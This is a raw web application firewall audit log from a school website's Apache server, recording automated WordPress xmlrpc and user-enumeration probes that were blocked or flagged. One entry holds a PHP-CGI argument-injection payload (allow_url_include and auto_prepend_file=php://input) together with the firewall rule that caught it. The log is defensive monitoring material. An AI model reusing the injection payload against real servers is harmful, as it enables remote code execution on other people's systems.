Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f970706f-Z-- --16e78c3d-A-- [09/May/2025:21:14:06 +0700] aB4NrlqQ1nOVx9fWpZSv_AAAAAQ 103.236.140.4 54402 103.236.140.4 8181 --16e78c3d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.131 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.131 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --16e78c3d-C-- demo.sayHello --16e78c3d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --16e78c3d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746800046687132 5065 (- - -) Stopwatch2: 1746800046687132 5065; combined=3839, p1=499, p2=3138, p3=23, p4=26, p5=90, sr=68, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16e78c3d-Z-- --000b222d-A-- [09/May/2025:21:14:31 +0700] aB4Nxx6q_ZMebht3q14jgQAAAIk 103.236.140.4 54420 103.236.140.4 8181 --000b222d-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.39.93.93 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.39.93.93 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --000b222d-C-- --000b222d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --000b222d-E-- --000b222d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746800071002593 8786 (- - -) Stopwatch2: 1746800071002593 8786; combined=7062, p1=532, p2=6493, p3=0, p4=0, p5=37, sr=118, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --000b222d-Z-- --618eac73-A-- [09/May/2025:21:17:22 +0700] aB4OclqQ1nOVx9fWpZSwBwAAAA4 103.236.140.4 54512 103.236.140.4 8181 --618eac73-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.108.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.108.92 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --618eac73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --618eac73-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746800242622696 2911 (- - -) Stopwatch2: 1746800242622696 2911; combined=1315, p1=461, p2=824, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --618eac73-Z-- --641afd7e-A-- [09/May/2025:21:17:28 +0700] aB4OeB6q_ZMebht3q14jrQAAAIY 103.236.140.4 54526 103.236.140.4 8181 --641afd7e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.108.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.108.92 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --641afd7e-C-- demo.sayHello --641afd7e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --641afd7e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746800248883384 6183 (- - -) Stopwatch2: 1746800248883384 6183; combined=4821, p1=575, p2=3954, p3=35, p4=37, p5=125, sr=82, sw=95, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --641afd7e-Z-- --e059a975-A-- [09/May/2025:21:21:37 +0700] aB4PcVoC-7ITMWTA_c9d1gAAANM 103.236.140.4 54760 103.236.140.4 8181 --e059a975-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.191 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.191 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e059a975-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e059a975-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746800497937497 3455 (- - -) Stopwatch2: 1746800497937497 3455; combined=1475, p1=523, p2=921, p3=0, p4=0, p5=31, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e059a975-Z-- --237c5e74-A-- [09/May/2025:21:21:47 +0700] aB4Pex6q_ZMebht3q14jrwAAAIU 103.236.140.4 54764 103.236.140.4 8181 --237c5e74-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.191 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.191 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --237c5e74-C-- demo.sayHello --237c5e74-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --237c5e74-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746800507927181 5987 (- - -) Stopwatch2: 1746800507927181 5987; combined=4363, p1=596, p2=3555, p3=30, p4=33, p5=88, sr=81, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --237c5e74-Z-- --12beb31a-A-- [09/May/2025:21:26:44 +0700] aB4QpFqQ1nOVx9fWpZSwcQAAABM 103.236.140.4 54804 103.236.140.4 8181 --12beb31a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.12 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --12beb31a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --12beb31a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746800804620295 3259 (- - -) Stopwatch2: 1746800804620295 3259; combined=1408, p1=450, p2=890, p3=0, p4=0, p5=68, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12beb31a-Z-- --fd4eb42b-A-- [09/May/2025:21:26:49 +0700] aB4QqR6q_ZMebht3q14jtgAAAJY 103.236.140.4 54826 103.236.140.4 8181 --fd4eb42b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.12 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fd4eb42b-C-- demo.sayHello --fd4eb42b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd4eb42b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746800809868639 5117 (- - -) Stopwatch2: 1746800809868639 5117; combined=4096, p1=512, p2=3334, p3=59, p4=33, p5=94, sr=72, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd4eb42b-Z-- --ec08ac3a-A-- [09/May/2025:21:45:36 +0700] aB4VEB6q_ZMebht3q14kZwAAAIg 103.236.140.4 55466 103.236.140.4 8181 --ec08ac3a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 198.23.217.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 198.23.217.37 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ec08ac3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec08ac3a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746801936426085 2430 (- - -) Stopwatch2: 1746801936426085 2430; combined=1375, p1=440, p2=904, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec08ac3a-Z-- --71e3342b-A-- [09/May/2025:21:54:24 +0700] aB4XH1qQ1nOVx9fWpZSxUQAAABU 103.236.140.4 56348 103.236.140.4 8181 --71e3342b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.197.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.197.40 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --71e3342b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --71e3342b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746802463997500 3226 (- - -) Stopwatch2: 1746802463997500 3226; combined=1357, p1=456, p2=870, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71e3342b-Z-- --71973133-A-- [09/May/2025:21:54:28 +0700] aB4XJFoC-7ITMWTA_c9eGwAAANI 103.236.140.4 56356 103.236.140.4 8181 --71973133-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.197.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.197.40 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --71973133-C-- demo.sayHello --71973133-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --71973133-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746802468913510 6640 (- - -) Stopwatch2: 1746802468913510 6640; combined=4677, p1=601, p2=3830, p3=36, p4=43, p5=99, sr=79, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71973133-Z-- --4099a028-A-- [09/May/2025:22:16:24 +0700] aB4cSFoC-7ITMWTA_c9eIQAAAMo 103.236.140.4 56516 103.236.140.4 8181 --4099a028-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4099a028-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4099a028-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746803784433029 4264 (- - -) Stopwatch2: 1746803784433029 4264; combined=1744, p1=627, p2=1076, p3=0, p4=0, p5=40, sr=100, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4099a028-Z-- --926ee92a-A-- [09/May/2025:22:16:30 +0700] aB4cTloC-7ITMWTA_c9eIwAAAME 103.236.140.4 56520 103.236.140.4 8181 --926ee92a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.222 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --926ee92a-C-- demo.sayHello --926ee92a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --926ee92a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746803790220212 5298 (- - -) Stopwatch2: 1746803790220212 5298; combined=3973, p1=513, p2=3246, p3=28, p4=30, p5=92, sr=75, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --926ee92a-Z-- --c0925a39-A-- [09/May/2025:22:21:19 +0700] aB4dby-fAO47ojYKsMr54wAAAEM 103.236.140.4 56554 103.236.140.4 8181 --c0925a39-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.124.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.124.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c0925a39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0925a39-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746804079149986 1992 (- - -) Stopwatch2: 1746804079149986 1992; combined=997, p1=347, p2=622, p3=0, p4=0, p5=27, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0925a39-Z-- --93982014-A-- [09/May/2025:22:21:27 +0700] aB4dd1qQ1nOVx9fWpZSxXgAAAAQ 103.236.140.4 56560 103.236.140.4 8181 --93982014-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.124.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.124.65 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --93982014-C-- demo.sayHello --93982014-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --93982014-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746804087535471 5350 (- - -) Stopwatch2: 1746804087535471 5350; combined=4057, p1=485, p2=3266, p3=85, p4=64, p5=93, sr=71, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93982014-Z-- --296f355f-A-- [09/May/2025:22:21:40 +0700] aB4dhFoC-7ITMWTA_c9eKQAAANY 103.236.140.4 56570 103.236.140.4 8181 --296f355f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.141 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --296f355f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --296f355f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746804100620611 2213 (- - -) Stopwatch2: 1746804100620611 2213; combined=1062, p1=325, p2=706, p3=0, p4=0, p5=31, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --296f355f-Z-- --6d11dd7e-A-- [09/May/2025:22:21:45 +0700] aB4diVqQ1nOVx9fWpZSxYwAAAAw 103.236.140.4 56578 103.236.140.4 8181 --6d11dd7e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.141 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6d11dd7e-C-- demo.sayHello --6d11dd7e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d11dd7e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity 